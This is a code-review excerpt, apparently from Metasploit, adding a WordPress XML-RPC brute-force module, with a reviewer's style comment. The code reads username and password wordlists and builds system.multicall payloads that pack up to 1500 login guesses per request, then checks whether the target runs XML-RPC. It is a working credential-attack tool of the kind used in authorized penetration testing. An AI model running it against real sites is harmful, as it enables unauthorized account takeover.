modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb

```diff
@@ -0,0 +1,171 @@
+          ))
+
+    register_options(
+        [
+            OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line',
+                                        File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
+            OptPath.new('WPPASS_FILE',  [ true, 'File containing passwords, one per line',
+                                          File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")])
+        ], self.class)
+
+
+    register_advanced_options(
+        [
+            OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
+            OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5])
+        ], self.class)
+  end
+
+  def usernames
+    File.readlines(datastore['WPUSER_FILE']).map {|user| user.chomp}
+  end
+
+  def passwords
+    File.readlines(datastore['WPPASS_FILE']).map {|pass| pass.chomp}
+  end
+
+  def generate_xml user
+
+    print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
+    xml_payloads = []                          # Container for all generated XMLs
+    xml = ""
+    # Evil XML | Limit number of log-ins to 1700/request for wordpress limitation
+    passwords.each_slice(1500) do |pass_group|
+
+      xml =  "<?xml version=\"1.0\"?>\n"
+      xml << "<methodCall>\n"
+      xml << "<methodName>system.multicall</methodName>\n"
+      xml << "<params>\n"
+      xml << " <param><value><array><data>\n"
+      pass_group.each  do |pass|
+
+        xml << "  <value><struct>\n"
+        xml << "  <member>\n"
+        xml << "    <name>methodName</name>\n"
+        xml << "    <value><string>wp.getUsersBlogs</string></value>\n"
+        xml << "  </member>\n"
+        xml << "  <member>\n"
+        xml << "    <name>params</name><value><array><data>\n"
+        xml << "     <value><array><data>\n"
+        xml << "      <value><string>#{user}</string></value>\n"
+        xml << "      <value><string>#{pass}</string></value>\n"
+        xml << "     </data></array></value>\n"
+        xml << "    </data></array></value>\n"
+        xml << "  </member>\n"
+        xml << "  </struct></value>\n"
+
+      end
+      xml << " </data></array></value></param>\n"
+      xml << "</params>\n"
+      xml << "</methodCall>"
+
+      xml_payloads << xml
+    end
+
+    print_status('Generating XMLs just done.')
+    return xml_payloads
+  end
+
+  #
+  # Check target status
+  #
+  def check_wpstatus
+    print_status("Checking #{peer} status!")
+
+    case
+      when !wordpress_and_online?
+        print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress or you got blocked!")
+        :abort
+      when !wordpress_xmlrpc_enabled?
+        print_error("#{rhost}:#{rport}#{target_uri} does not enable XMLRPC")
+        :abort
+      else
+        print_status("Target #{peer} is running Wordpress")
+    end
```

Comment:
Case shouldn't be used here. You are checking completely different variables so it should be simple if. Also use return rather than abort.